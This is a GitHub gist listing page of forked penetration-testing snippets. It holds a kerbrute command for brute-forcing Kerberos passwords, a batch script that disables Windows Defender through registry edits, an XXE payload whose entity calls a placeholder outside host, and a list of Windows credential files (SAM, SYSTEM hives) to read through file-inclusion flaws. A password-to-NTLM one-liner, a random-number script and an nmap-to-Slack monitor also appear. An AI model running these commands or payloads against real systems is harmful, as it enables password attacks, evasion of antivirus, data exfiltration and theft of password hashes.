With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
victorcamposm
/ kerberos_attacks_cheatsheet.md
Created
June 3, 2024 14:51
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
victorcamposm
/ passwordToNTLM.sh
Created
September 22, 2022 13:55
— forked from t0-n1/passwordToNTLM.sh
Get NTLM hash from password
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| password='Passw0rd!' | |
| echo -n $password | iconv -f ascii -t utf-16le | openssl dgst -md4 |
victorcamposm
/ disable_windows_defender.bat
Created
January 4, 2022 13:44
— forked from pe3zx/disable_windows_defender.bat
Disable Windows Defender on Windows 10 1903
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!! | |
| rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference | |
| rem To also disable Windows Defender Security Center include this | |
| rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f | |
| rem 1 - Disable Real-time protection | |
| reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | |
| reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
victorcamposm
/ XXE_payloads
Created
October 18, 2020 13:22
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import random | |
| start = 1 | |
| end = 100 | |
| r = random.randint(start,end+1) | |
| print("Random number: " + str(r)) | |
| g = end/2 | |
| for i in range(1,100): | |
| print("g = " + str(g)) |
victorcamposm
/ windows_blind
Created
July 20, 2020 20:39
— forked from sckalath/windows_blind
Windows Blind Files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %SYSTEMDRIVE%\boot.ini | |
| %WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system. | |
| %SYSTEMROOT%\repair\SAM | |
| %SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
| %SYSTEMROOT%\repair\system | |
| %SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
| %SYSTEMROOT%\repair\SAM | |
| %SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files. | |
| %WINDIR%\repair\sam | |
| %WINDIR%\repair\system |
victorcamposm
/ slackmap.sh
Created
December 22, 2019 09:23
— forked from jgamblin/slackmap.sh
Script to NMAP a network and Post Differences to Slack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| TARGETS="192.168.1.0/24" | |
| OPTIONS="-v -T4 -F -sV" | |
| date=$(date +%Y-%m-%d-%H-%M-%S) | |
| cd /nmap/diffs | |
| nmap $OPTIONS $TARGETS -oA scan-$date > /dev/null | |
| slack(){ | |
| curl -F file=@diff-$date -F initial_comment="Internal Port Change Detected" -F channels=#alerts -F token=xxxx-xxxx-xxxx https://slack.com/api/files.upload | |
| } |